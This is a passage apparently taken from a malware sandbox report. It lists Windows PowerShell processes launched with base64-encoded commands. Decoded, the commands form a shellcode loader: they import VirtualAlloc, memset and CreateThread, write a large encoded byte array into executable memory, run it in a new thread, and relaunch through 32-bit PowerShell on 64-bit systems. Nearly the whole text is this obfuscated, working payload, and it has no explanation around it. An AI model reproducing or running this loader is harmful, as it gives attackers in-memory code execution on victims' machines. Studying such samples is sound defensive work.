A0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA='"
2⤵
PID:8300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA=
3⤵
PID:8760

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAGYAQQBqACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWQBmAEEAagAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAMQAzACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAMQBlACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYgAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAA3AGEALAAwAHgAMABlACwAMAB4ADIAMwAsADAAeAAxADQALAAwAHgAOAAyACwAMAB4AGMAZgAsADAAeAA1AGMALAAwAHgAOQBjACwAMAB4ADYANwAsADAAeABmAGUALAAwAHgANABlACwAMAB4AGYAYQAsADAAeABlAGMALAAwAHgANQAzACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADUAZgAsADAAeAAxADQALAAwAHgAZABjACwAMAB4ADUAMAAsADAAeABlAGIALAAwAHgANQA4ACwAMAB4AGMAOQAsADAAeAA2ADkALAAwAHgAMQA0ACwAMAB4ADkAMwAsADAAeABiAGUALAAwAHgAYwAzACwAMAB4AGMAYwAsADAAeAA5AGQALAAwAHgAMAAwACwAMAB4ADcAZgAsADAAeAAyAGMALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeAA3AGQALAAwAHgANgAxACwAMAB4ADEAZgAsADAAeAAzAGMALAAwAHgANABlACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeAAxADIALAAwAHgAYQBlACwAMAB4ADUAZgAsADAAeAA1ADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeAA2ADEALAAwAHgAYgAzACwAMAB4ADMAMQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZAA2ACwAMAB4AGQANgAsADAAeABlADcALAAwAHgANAAzACwAMAB4ADAANwAsADAAeAA5AGQALAAwAHgAYQAwACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAMgA5ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgA2ACwAMAB4AGYAZQAsADAAeAAxAGMALAAwAHgAYgAyACwAMAB4ADgAYwAsADAAeAAzAGMALAAwAHgAMgBlACwAMAB4AGIAYgAsADAAeAAyADQALAAwAHgAYgA2ACwAMAB4ADYANAAsADAAeABjADgALAAwAHgAYgA2ACwAMAB4ADEAZQAsADAAeABiADUALAAwAHgAMABlACwAMAB4ADcAOQAsADAAeAA1ADEALAAwAHgAYgBiACwAMAB4ADIAMgAsADAAeAA3AGIALAAwAHgAYQA5ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgAMAA5ACwAMAB4AGMAMQAsADAAeABmAGUALAAwAHgANgA3ACwAMAB4ADAAYQAsADAAeAAxADIALAAwAHgANwBjACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgAOAA1ACwAMAB4ADIANgAsADAAeAAzADAALAAwAHgAMAA3ACwAMAB4ADYAMgAsADAAeABkADYALAAwAHgAOQA1ACwAMAB4AGQAZQAsADAAeABlADEALAAwAHgAZAA0ACwAMAB4ADUAMgAsADAAeAA5ADQALAAwAHgAYQBlACwAMAB4AGYAOAAsADAAeAA2ADUALAAwAHgANwA5ACwAMAB4AGMANQAsADAAeAAwADUALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABjACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4AGQANAAsADAAeAA2AGYALAAwAHgAYwAyACwAMAB4ADkANwAsADAAeABiADAALAAwAHgAZABlACwAMAB4AGYAYgAsADAAeABjADgALAAwAHgAMQBkACwAMAB4AGIAZgAsADAAeAA1ADkALAAwAHgAOAAyACwAMAB4ADgAYwAsADAAeABkADYALAAwAHgAZABlACwAMAB4ADYAYgAsADAAeAA0AGYALAAwAHgAZAA3ACwAMAB4ADgAMgAsADAAeABmAGIALAAwAHgAOAAzACwAMAB4ADEANQAsADAAeAAzAGQALAAwAHgAZgBjACwAMAB4ADgAYgAsADAAeAAyAGUALAAwAHgANABlACwAMAB4AGMAZQAsADAAeAAxADQALAAwAHgAOAA0ACwAMAB4AGQAOAAsADAAeAA2ADIALAAwAHgAZABjACwAMAB4ADAAMgAsADAAeAAxAGUALAAwAHgAZgAyACwAMAB4AGMAYQAsADAAeABiADUALAAwAHgAZgAwACwAMAB4AGIAYwAsADAAeAA5AGIALAAwAHgANAA4ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAYgAyACwAMAB4ADgAZQAsADAAeABhADUALAAwAHgAZQBjACwAMAB4AGEAYwAsADAAeAAyADcALAAwAHgAYwA2ACwAMAB4ADYANgAsADAAeAAyAGQALAAwAHgAYwA4ACwAMAB4ADEAMwAsADAAeAAxADIALAAwAHgAMgA3ACwAMAB4ADUAZQAsADAAeAA1AGMALAAwAHgANABiACwAMAB4ADYAZgAsADAAeAAxAGUALAAwAHgAMwA0ACwAMAB4ADgAZQAsADAAeAA5ADAALAAwAHgAMQBhACwAMAB4ADcAOQAsADAAeAAwADcALAAwAHgANwA2ACwAMAB4ADcAMgAsADAAeABkADEALAAwAHgANAA4ACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgAOAAxACwAMAB4ADIAOAAsADAAeAA5ADcALAAwAHgAZABhACwAMAB4AGMAYgAsADAAeABhADYALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABmADMALAAwAHgANgBjACwAMAB4ADYAMQAsADAAeAA5ADAALAAwAHgAMQBiACwAMAB4AGQAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADgANQAsADAAeAA0ADAALAAwAHgAOQAxACwAMAB4AGEAZAAsADAAeAA0AGEALAAwAHgANQBmACwAMAB4AGQAZgAsADAAeABlAGQALAAwAHgAYwAxACwAMAB4ADYAYwAsADAAeAAxAGYALAAwAHgAYQAzACwAMAB4ADIAMQAsADAAeAAxADgALAAwAHgAMwAzACwAMAB4ADUAMwAsADAAeABjADIALAAwAHgANQA3ACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgAZABkACwAMAB4ADQAZAAsADAAeAAwADQALAAwAHgAZgA5ACwAMAB4ADQAYgAsADAAeAA2AGEALAAwAHgAOABmACwAMAB4AGEAZQAsADAAeABlADMALAAwAHgANwAwACwAMAB4AGYANgAsADAAeAA5ADgALAAwAHgAYQBiACwAMAB4ADgAYgAsADAAeABkAGQALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAxAGUALAAwAHgAOQBlACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAYwBlACwAMAB4ADEAZQAsADAAeAAwAGIALAAwAHgAZABkACwAMAB4ADgANAAsADAAeAAxAGUALAAwAHgANgAzACwAMAB4AGIAOQAsADAAeABmAGMALAAwAHgANABjACwAMAB4ADkANgAsADAAeABjADYALAAwAHgAMgA4ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgANQAzACwAMAB4AGQAMwAsADAAeAA1ADAALAAwAHgAZgA4ACwAMAB4AGYANAAsADAAeABiAGIALAAwAHgANQBlACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgANgA0ACwAMAB4AGEAMAAsADAAeAAwADIALAAwAHgAYwAyACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgANgBhACwAMAB4AGIAMAAsADAAeABiADAALAAwAHgANABiADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABVAGYAbQB5AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAW